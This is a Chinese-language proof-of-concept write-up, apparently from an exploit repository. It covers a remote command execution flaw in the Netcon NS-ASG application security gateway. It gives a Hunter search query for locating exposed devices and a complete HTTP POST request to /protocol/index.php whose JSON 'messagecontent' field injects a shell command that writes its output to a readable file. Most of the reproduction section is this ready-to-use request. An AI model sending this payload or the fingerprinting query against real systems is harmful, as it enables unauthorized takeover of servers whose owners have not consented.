POC00/网康NS-ASG应用安全网关存在远程命令执行漏洞.md
2025-04-02 22:36:18 +08:00

47 lines
1.9 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 网康 NS-ASG应用安全网关存在远程命令执行漏洞
# 一、漏洞简介
网康科技有限公司是中国技术领先的网络应用管理设备提供商,专注于网络应用管理领域最前沿的趋势研究和分析,为用户提供先进的网络应用管理技术、产品与解决方案,旨在帮助用户实现“上好网 用好网”的网络管理目标。网康应用安全网关系统存在远程命令执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
# 二、影响版本
+ 网康应用安全网关系统
# 三、资产测绘
+ hunter`web.title=="网康 NS-ASG 应用安全网关"`
+ 特征
![1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be.png](./img/Q3wbZCP7nLEzpjt6/1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be-739231.png)
# 四、漏洞复现
1. 执行如下执行POC语句同时执行id命令并写入/protocol/1.txt。
```plain
POST /protocol/index.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>1.txt;"}
```
![1700040012683-b9714aa9-b738-429c-8700-a475eff2249d.png](./img/Q3wbZCP7nLEzpjt6/1700040012683-b9714aa9-b738-429c-8700-a475eff2249d-740368.png)
2. 访问`/protocol/1.txt`路径,获取命令执行结果。
```plain
/protocol/1.txt
```
![1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce.png](./img/Q3wbZCP7nLEzpjt6/1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce-691820.png)
> 更新: 2024-02-29 23:57:15
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zut666gci4d1s4sv>